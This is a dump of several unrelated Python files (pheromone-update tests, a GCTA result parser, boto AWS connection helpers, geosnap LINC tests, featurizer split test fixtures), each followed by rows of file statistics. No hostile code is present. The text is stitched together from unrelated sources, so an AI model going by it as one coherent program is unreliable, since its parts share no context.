[0.0, 0.6667931285555115, 0.5970146362973399, 1.0191352967734122],
[0.5334914082114515, 0.0, 0.6989573069245543, 0.3937669813472373],
[0.5970146362973399, 0.6989573069245543, 0.0, 0.42659206719560916],
[0.9739191201245483, 0.3937669813472373, 0.23324008039305005, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.8, 0.3, 0.2], dtype=np.float64)
updateDirACS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.5)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirACS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirACS()')
def test():
test_directed_AS_update()
test_undirected_AS_update()
test_directed_AS_elite_update()
test_undirected_AS_elite_update()
test_directed_MMAS_update()
test_directed_MMAS_elite_update()
test_undirected_MMAS_update()
test_undirected_MMAS_elite_update()
test_undirected_local_update()
test_directed_local_update()
test_undirected_ACS()
test_directed_ACS()
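if __name__ == '__main__':
    # Minimal entry point so the suite can be run directly
    # (python c_pheromone.py); added for convenience.
    test()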
| 35.466165 | 104 | 0.588722 | 2,714 | 18,868 | 3.99521 | 0.046794 | 0.043161 | 0.036245 | 0.019183 | 0.862584 | 0.794891 | 0.791571 | 0.773126 | 0.772757 | 0.769437 | 0 | 0.2541 | 0.243693 | 18,868 | 531 | 105 | 35.532957 | 0.505746 | 0.041446 | 0 | 0.706601 | 0 | 0 | 0.113359 | 0.080018 | 0 | 0 | 0 | 0 | 0.07335 | 1 | 0.031785 | false | 0 | 0.00978 | 0 | 0.041565 | 0.02934 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
94e5d42ec03fb47d69e5a87aff97b27ca817ae76 | 2,823 | py | Python | limix_ext/gcta/core/result.py | glimix/limix-ext | 7cf7a3b2b02f6a73cbba90f1945a06b9295b7357 | [
"MIT"
] | null | null | null | limix_ext/gcta/core/result.py | glimix/limix-ext | 7cf7a3b2b02f6a73cbba90f1945a06b9295b7357 | [
"MIT"
] | 2 | 2017-06-05T08:29:22.000Z | 2017-06-07T16:54:54.000Z | limix_ext/gcta/core/result.py | glimix/limix-ext | 7cf7a3b2b02f6a73cbba90f1945a06b9295b7357 | [
"MIT"
] | null | null | null | import re
import numpy as np
class Result(object):
def __init__(self, filename):
with open(filename, 'r') as f:
f.readline()
line = f.readline().split('\t')
self.var_g = float(line[1])
self.var_g_se = float(line[2])
line = f.readline().split('\t')
self.var_n = float(line[1])
self.var_n_se = float(line[2])
line = f.readline().split('\t')
self.var_total = float(line[1])
self.var_total_se = float(line[2])
f.readline()
f.readline()
line = f.readline()
match = re.match(
r'.* in the sample = (.*); User-specified disease prevalence = (.*)\).*',
line)
self.prevalence_in_sample = float(match.group(1))
self.prevalence_specified = float(match.group(2))
line = f.readline()
self._heritability_liability_scale = float(line.split('\t')[1])
if np.abs(self.var_g + self.var_n - self.var_total) > 1e-5:
raise Exception(
"Total variance differ from var_g + var_n: %.6f." %
np.abs(self.var_g + self.var_n - self.var_total))
@property
def heritability_liability_scale(self):
return self._heritability_liability_scale
@property
def heritability_observed_scale(self):
return self.var_g / self.var_total
    # def __str__(self):
    #     from tabulate import tabulate
    #     return tabulate([['genetic var', self.var_g],
    #                      ['noise var', self.var_n],
    #                      ['total var', self.var_total],
    #                      ['heritability', self.heritability_observed_scale]])
class ResultContinuous(object):
    """Parses a GCTA REML (.hsq) summary for a quantitative trait."""
def __init__(self, filename):
with open(filename, 'r') as f:
f.readline()
line = f.readline().split('\t')
self.var_g = float(line[1])
self.var_g_se = float(line[2])
line = f.readline().split('\t')
self.var_n = float(line[1])
self.var_n_se = float(line[2])
line = f.readline().split('\t')
self.var_total = float(line[1])
self.var_total_se = float(line[2])
line = f.readline().split('\t')
self._heritability_liability_scale = float(line[1])
@property
def heritability_liability_scale(self):
return self._heritability_liability_scale
@property
def heritability_observed_scale(self):
return self.var_g / self.var_total
    # def __str__(self):
    #     from tabulate import tabulate
    #     return tabulate([['genetic var', self.var_g],
    #                      ['noise var', self.var_n],
    #                      ['total var', self.var_total],
    #                      ['heritability', self.heritability_observed_scale]])
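# A minimal usage sketch (the .hsq filename is hypothetical; GCTA's --reml
# run writes this tab-separated summary file):
#
#   result = Result("phenotype.hsq")
#   print(result.heritability_liability_scale, result.heritability_observed_scale)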
| 31.366667 | 89 | 0.529933 | 332 | 2,823 | 4.28012 | 0.174699 | 0.137931 | 0.056298 | 0.08867 | 0.808586 | 0.793103 | 0.741027 | 0.741027 | 0.741027 | 0.741027 | 0 | 0.01015 | 0.336876 | 2,823 | 89 | 90 | 31.719101 | 0.748932 | 0.161176 | 0 | 0.732143 | 0 | 0 | 0.056852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.035714 | 0.071429 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bf68ff1a5312329738f06cd4cf6e2a2f44777a9f | 2,864 | py | Python | __init__.py | gongchengshi/aws | d04d42739e026d2e99936dd046be05293e063e08 | [
"MIT"
] | null | null | null | __init__.py | gongchengshi/aws | d04d42739e026d2e99936dd046be05293e063e08 | [
"MIT"
] | null | null | null | __init__.py | gongchengshi/aws | d04d42739e026d2e99936dd046be05293e063e08 | [
"MIT"
] | null | null | null | import boto
import boto.ec2
import boto.ec2.cloudwatch
import boto.sdb
import boto.sqs
import boto.dynamodb
import boto.sns
import boto.s3
from boto.s3.connection import S3Connection
from aws.constants import AwsAccessKey, AwsSecretKey
class USWest2:
    """Connection factories for AWS services in us-west-2."""
    region = 'us-west-2'
@staticmethod
def sdb():
return boto.sdb.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ddb():
return boto.dynamodb.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ec2():
return boto.ec2.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def cloudwatch():
return boto.ec2.cloudwatch.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def sqs():
return boto.sqs.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def s3():
return boto.s3.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def sns():
return boto.sns.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
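# A minimal usage sketch (assumes valid credentials in aws.constants):
#
#   ec2 = USWest2.ec2()
#   for reservation in ec2.get_all_reservations():
#       print(reservation.instances)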
class USEast1:
    """Connection factories for AWS services in us-east-1."""
    region = 'us-east-1'
@staticmethod
def sdb():
return boto.sdb.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ddb():
return boto.dynamodb.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ec2():
return boto.ec2.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def sqs():
return boto.sqs.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def s3():
return S3Connection(AwsAccessKey, AwsSecretKey)
@staticmethod
def sns():
return boto.sns.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey) | 34.926829 | 120 | 0.627444 | 305 | 2,864 | 5.577049 | 0.114754 | 0.126984 | 0.10582 | 0.126984 | 0.823633 | 0.823633 | 0.823633 | 0.823633 | 0.823633 | 0.787184 | 0 | 0.014617 | 0.307263 | 2,864 | 82 | 121 | 34.926829 | 0.842742 | 0 | 0 | 0.578125 | 0 | 0 | 0.006283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203125 | false | 0 | 0.140625 | 0.203125 | 0.609375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
bf961a09fd659a714441e349113514bcd6b5b789 | 130 | py | Python | 2-resources/Lambda-weeks/m7/71e1/cs-sprint-challenge-hash-tables-master/hashtables/ex1/ex1.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | 2-resources/Lambda-weeks/m7/71e1/cs-sprint-challenge-hash-tables-master/hashtables/ex1/ex1.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | 2-resources/Lambda-weeks/m7/71e1/cs-sprint-challenge-hash-tables-master/hashtables/ex1/ex1.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | def get_indices_of_item_weights(weights, length, limit):
"""
YOUR CODE HERE
"""
# Your code here
return None
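# A quick check (hypothetical data, consistent with the one-pass hash-table
# implementation above):
#
#   get_indices_of_item_weights([4, 6, 10, 15, 16], 5, 21)  # -> (3, 1)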
| 16.25 | 56 | 0.630769 | 17 | 130 | 4.588235 | 0.764706 | 0.205128 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.276923 | 130 | 7 | 57 | 18.571429 | 0.829787 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
449c4a6f0088490c5bd439693d0f042a1c75de71 | 109 | py | Python | face_detector_ssd/model_provider.py | keiji/face_detector_with_tensorflow | 36a440b177c2decaa34ec8cd0311a8283969d932 | [
"Apache-2.0"
] | 1 | 2018-11-16T13:09:06.000Z | 2018-11-16T13:09:06.000Z | face_detector_ssd/model_provider.py | keiji/face_detector_with_tensorflow | 36a440b177c2decaa34ec8cd0311a8283969d932 | [
"Apache-2.0"
] | null | null | null | face_detector_ssd/model_provider.py | keiji/face_detector_with_tensorflow | 36a440b177c2decaa34ec8cd0311a8283969d932 | [
"Apache-2.0"
] | null | null | null | import model.model1
import model_lightweight.model10 as model10_lw  # lightweight alternative, kept for easy swapping
def get_model():
return model.model1
| 13.625 | 46 | 0.807339 | 16 | 109 | 5.3125 | 0.625 | 0.258824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 0.137615 | 109 | 7 | 47 | 15.571429 | 0.840426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
44eeaa67e8b6378a13ffb7d28f2c9830a040185a | 10,308 | py | Python | geosnap/tests/test_incs.py | WawNun/geosnap | 9838498b89d42c94fef73ee2983dd385dab17345 | [
"BSD-3-Clause"
] | 14 | 2018-09-19T22:34:44.000Z | 2019-04-03T17:18:22.000Z | geosnap/tests/test_incs.py | WawNun/geosnap | 9838498b89d42c94fef73ee2983dd385dab17345 | [
"BSD-3-Clause"
] | 55 | 2018-10-01T18:31:25.000Z | 2019-04-08T16:23:46.000Z | geosnap/tests/test_incs.py | WawNun/geosnap | 9838498b89d42c94fef73ee2983dd385dab17345 | [
"BSD-3-Clause"
] | 5 | 2018-10-02T21:41:46.000Z | 2019-01-25T02:59:16.000Z | from geosnap import analyze, DataStore
from geosnap.analyze.incs import lincs_from_gdf
from geosnap.io import get_census
from geosnap.harmonize import harmonize
from numpy.testing import assert_array_almost_equal
import numpy as np
linc = analyze.incs.linc
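# linc() is geosnap's Local Indicator of Neighborhood Change: for each unit
# it returns 1 - |intersection| / |union| of the unit's cluster co-members
# across the label sequences (0 = co-membership fully stable, 1 = complete
# turnover).  In test_linc below, unit 4's co-members change from {5} to
# {0, 1, 2, 3} (disjoint), so its LINC is 1.0; over three periods unit 0's
# co-members intersect in {1, 2, 3} and union to {1, 2, 3, 4}, giving
# 1 - 3/4 = 0.25.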
def test_linc():
labels_0 = [1, 1, 1, 1, 2, 2, 3, 3, 3, 4]
labels_1 = [1, 1, 1, 1, 1, 2, 3, 3, 3, 4]
res = linc([labels_0, labels_1])
assert res[4] == 1.0
assert res[7] == 0.0 == res[-1]
labels_2 = [1, 1, 1, 1, 1, 2, 3, 3, 3, 4]
res = linc([labels_1, labels_2])
assert res[0] == 0.0
res = linc([labels_0, labels_1, labels_2])
assert res[0] == 0.25
def test_linc_from_gdf():
columns = [
"median_household_income",
"p_poverty_rate",
"p_unemployment_rate",
]
reno = get_census(DataStore(), msa_fips="39900")
rdf = harmonize(reno, target_year=1990, intensive_variables=columns)
rdf = analyze.cluster(reno, columns=columns, method="ward")
l = lincs_from_gdf(
rdf, unit_index="geoid", temporal_index="year", cluster_col="ward"
)
assert_array_almost_equal(
l.linc.values,
np.array(
[
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.85714286,
0.5,
1.0,
0.8,
0.0,
0.0,
0.0,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.5,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
0.8,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.85714286,
0.5,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.5,
0.0,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.5,
1.0,
1.0,
1.0,
0.0,
0.5,
0.5,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
),
decimal=3,
)
def test_linc_from_gdf_subset():
columns = [
"median_household_income",
"p_poverty_rate",
"p_unemployment_rate",
"n_total_pop",
]
reno = get_census(DataStore(), msa_fips="39900")
rdf = harmonize(reno, target_year=1990, intensive_variables=columns)
rdf = analyze.cluster(
rdf,
columns=columns,
method="ward",
)
l = lincs_from_gdf(
rdf,
unit_index="geoid",
temporal_index="year",
cluster_col="ward",
periods=[2000, 2010],
)
assert_array_almost_equal(
l.linc.values,
np.array(
[
0.96969697,
0.78571429,
0.8,
0.75,
0.66666667,
0.8125,
0.78571429,
0.80952381,
1.0,
0.8,
0.75,
0.74074074,
0.80952381,
0.80952381,
0.92307692,
1.0,
0.8,
0.78571429,
0.78571429,
0.75,
0.8125,
0.75,
0.74074074,
0.74074074,
0.8,
0.75,
0.66666667,
0.90909091,
0.66666667,
0.92307692,
1.0,
1.0,
0.74074074,
0.80952381,
1.0,
1.0,
1.0,
0.74074074,
0.96969697,
1.0,
0.8125,
0.74074074,
0.74074074,
1.0,
0.80952381,
0.8125,
0.96153846,
0.90909091,
0.74074074,
0.66666667,
0.66666667,
0.66666667,
0.66666667,
0.66666667,
0.66666667,
0.96153846,
0.66666667,
0.66666667,
]
),
decimal=3,
)
def test_linc_method():
columns = [
"median_household_income",
"p_poverty_rate",
"p_unemployment_rate",
"n_total_pop",
]
reno = get_census(DataStore(), msa_fips="39900")
rdf = harmonize(reno, target_year=2010, intensive_variables=columns)
_, model = analyze.cluster(rdf, columns=columns, method="ward", return_model=True)
l = model.lincs.linc.values
assert_array_almost_equal(
l,
np.array(
[
0.9047619,
0.94594595,
0.82608696,
0.875,
0.97142857,
0.9047619,
1.0,
0.96428571,
0.97560976,
1.0,
0.82608696,
1.0,
0.92682927,
0.94285714,
1.0,
0.94285714,
0.92682927,
1.0,
0.90909091,
0.94285714,
1.0,
1.0,
1.0,
0.975,
0.9047619,
0.97560976,
1.0,
0.82608696,
0.82608696,
0.94594595,
0.875,
0.875,
0.96428571,
0.875,
0.90625,
1.0,
0.9137931,
0.98360656,
1.0,
0.875,
1.0,
0.98181818,
0.97619048,
0.90909091,
0.98181818,
0.90909091,
0.94594595,
0.82608696,
0.97619048,
0.90909091,
0.90625,
0.9137931,
0.93333333,
0.93333333,
1.0,
1.0,
0.93333333,
0.93333333,
0.975,
0.90625,
0.96666667,
0.96666667,
0.98507463,
0.9137931,
0.94339623,
0.93939394,
0.93939394,
0.94339623,
0.94339623,
0.9137931,
0.97142857,
0.875,
0.93939394,
0.93939394,
0.93939394,
0.98507463,
1.0,
1.0,
0.9047619,
0.96666667,
0.9047619,
0.90909091,
0.94339623,
0.90625,
0.90625,
0.9137931,
0.9137931,
0.98214286,
0.984375,
0.95918367,
0.95918367,
0.95918367,
0.92682927,
0.92682927,
0.98360656,
0.96551724,
0.98214286,
0.96551724,
0.984375,
1.0,
1.0,
0.98214286,
0.96551724,
0.90625,
0.90625,
0.98214286,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
),
decimal=3,
)
| 23.427273 | 86 | 0.284245 | 984 | 10,308 | 2.895325 | 0.109756 | 0.228852 | 0.30537 | 0.390312 | 0.623026 | 0.492102 | 0.469287 | 0.427869 | 0.412425 | 0.412425 | 0 | 0.406202 | 0.621459 | 10,308 | 439 | 87 | 23.480638 | 0.323936 | 0 | 0 | 0.88361 | 0 | 0 | 0.023574 | 0.006694 | 0 | 0 | 0 | 0 | 0.019002 | 1 | 0.009501 | false | 0 | 0.014252 | 0 | 0.023753 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
44f30acbebf15a55d8cd1ec08c8b897d854673b5 | 31,762 | py | Python | test/unittest_split/create_expected_output_split.py | FrancisLi196/featurizer | dc7c817281b16aee21da7141f7996889efd2159e | [
"Apache-2.0"
] | null | null | null | test/unittest_split/create_expected_output_split.py | FrancisLi196/featurizer | dc7c817281b16aee21da7141f7996889efd2159e | [
"Apache-2.0"
] | null | null | null | test/unittest_split/create_expected_output_split.py | FrancisLi196/featurizer | dc7c817281b16aee21da7141f7996889efd2159e | [
"Apache-2.0"
] | 1 | 2020-12-09T07:43:29.000Z | 2020-12-09T07:43:29.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import torch
import pandas as pd
import numpy as np
from functools import reduce
import pdb
from featurizer.functions.split import *
###############
# 2d Data (for split() and split_sample())
###############
np.random.seed(520)
data2d_np = np.random.randn(11,3).round(2)
'''
>>> data2d_np
array([[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])
'''
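# Minimal reference sketch of the windowing that the expected lists below
# encode.  The semantics are inferred from the four split() cases, not taken
# from the library source: overlapping windows of `window` rows advance by
# `step`; rows left over after the last full window become a short tail chunk
# (keep_tail=False), while keep_tail=True anchors the windows at the end of
# the data and emits the leftover as a short head chunk.
def _naive_split(arr, window, step, offset=0, keep_tail=False):
    n = len(arr)
    if not keep_tail:
        starts = list(range(offset, n - window + 1, step))
        chunks = [arr[s:s + window] for s in starts]
        last_end = starts[-1] + window if starts else offset
        if last_end < n:
            chunks.append(arr[last_end:])  # e.g. the 1-row array in Case 2
    else:
        stops = list(range(n, offset + window - 1, -step))
        chunks = [arr[s - window:s] for s in reversed(stops)]
        first_start = stops[-1] - window if stops else n
        if first_start > offset:
            chunks.insert(0, arr[offset:first_start])  # e.g. Case 3's 1-row head
    return chunks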
############################# Expected output for split() ##############################
#################
# Case 1:
# the most basic scenario, where step = 1
#################
# data_list_split_basic = split(data2d_np, window=8, step=1, offset = 0, keep_tail=False)
expected_list_split_basic = [np.array([[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]),
np.array([[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]),
np.array([[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##############
# Case 2:
# step = 2; expect a smaller sized last list
##############
# data_list_split_2steps = split(data2d_np, window=8, step=2, offset = 0, keep_tail=False)
expected_list_split_2steps = [np.array([[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]),
np.array([[ 0.01, 1.92, -0.68]])]
################
# Case 3:
# keep_tail = True, while other parameters unchanged; expect a smaller sized first list
################
# data_list_split_kepttail = split(data2d_np, window=8, step=2, offset = 0, keep_tail=True)
expected_list_split_kepttail = [np.array([[-1.41, -0.28, -0.03]]),
np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]),
np.array([[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
#################
# Case 4:
# offset = 2; expect one less list than if offset = 0
#################
# data_list_split_2offset = split(data2d_np, window=8, step=2, offset = 2, keep_tail=False)
expected_list_split_2offset = [np.array([[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]),
np.array([[ 0.01, 1.92, -0.68]])]
############################# Expected output for split_sample() ##############################
# parameters consistent across tests for split_sample() and split_sample3d()
window_sample, step_sample, offset_sample = 5, 3, 1
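# split_sample() behaviour as encoded by the four cases below (inferred from
# the expected lists, not from the library source): it cuts
# floor((n_rows - offset - window) / step) + 1 samples of `window` rows
# advancing by `step` -- here floor((11 - 1 - 5) / 3) + 1 = 2 samples.
# keep_tail=False anchors the samples just after `offset`; keep_tail=True
# anchors them at the end of the data.  Rows left over are merged into the
# nearest edge sample when merge_remain=True and dropped when
# merge_remain=False.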
##################
# Case 1:
# keep_tail = False, merge_remain = True
##################
# data_list_split_sample_FT = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=True)
expected_list_split_sample_FT = [np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]),
np.array([[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##################
# Case 2:
# keep_tail = False, merge_remain = False
##################
# data_list_split_sample_FT = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=False)
expected_list_split_sample_FF = [np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]),
np.array([[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]])]
##################
# Case 3:
# keep_tail = True, merge_remain = True
##################
# data_list_split_sample_TT = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=True)
expected_list_split_sample_TT = [np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##################
# Case 4:
# keep_tail = True, merge_remain = False
##################
# data_list_split_sample_TF = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=False)
expected_list_split_sample_TF = [np.array([[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##########################################
##########################################
##################
# 3d data (for split3d() and split_sample3d())
##################
data3d_np_half = np.expand_dims(data2d_np, axis = 0)
data3d_np = np.vstack((data3d_np_half, data3d_np_half))
'''
>>> data3d_np
array([[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])
'''
############################# Expected output for split3d() ##############################
# test logic is identical to split()
##################
# Case 1:
# the most basic scenario, where step = 1
##################
# data_list_split3d_basic = split3d(data3d_np, window=8, step=1, offset=0, keep_tail=False, dim=1)
